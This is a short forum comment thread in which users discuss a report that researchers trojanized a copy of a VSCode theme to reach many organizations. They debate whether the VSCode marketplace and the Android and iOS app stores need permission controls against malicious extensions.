23 points
*

I’d like to see permissions in VSCode plugins, so e.g. I could see that a plugin x can’t touch the filesystem or internet and is therefore more likely to be benign.

permalink
report
reply
14 points

“A group of Israeli researchers explored the security of the Visual Studio Code marketplace and managed to “infect” over 100 organizations by trojanizing a copy of the popular 'Dracula Official theme to include risky code. Further research into the VSCode Marketplace found thousands of extensions with millions of installs.”

permalink
report
reply
2 points

The plugin is called “Darcula Official” btw.

There is a more generic theme (for multiple applications) called Dracula.
JetBrains IDE has a theme called Darcula, and there are vscode themes on the marketplace that implement this.

So, it’s more than just a typosquat

permalink
report
parent
reply
7 points

Every time a company bitches that opening ““their”” devices to third party apps because “security” and “malware” I always think of shit like this.

The Google Play Store has tons of malware. iOS keeps it under wraps with their bullshit entry price and actually okay moderation, but are they a hundred and ten percent sure their signing key or database will never be exploited because there’s a mode on their devices to prevent zero-interaction malware because somehow an SMS being received ends up in the kernel.

permalink
report
reply
4 points

As @Deebster points out, on Android & iOS apps need to ask for permission before accessing sensitive commands beyond the kernel. VisualStudio (as far as as I know) doesn’t have a permissions layer. Also the article also mentions that scrutiny is lenient since VSCode is a Dev tool used by (on average) knowledgeable users.

100% agree with you, Microsoft is mostly cost cutting/shirking responsibility by not implementing tighter controls on external code on their tools.

permalink
report
parent
reply

Community stats

  • 26

    Monthly active users

  • 42

    Posts

  • 82

    Comments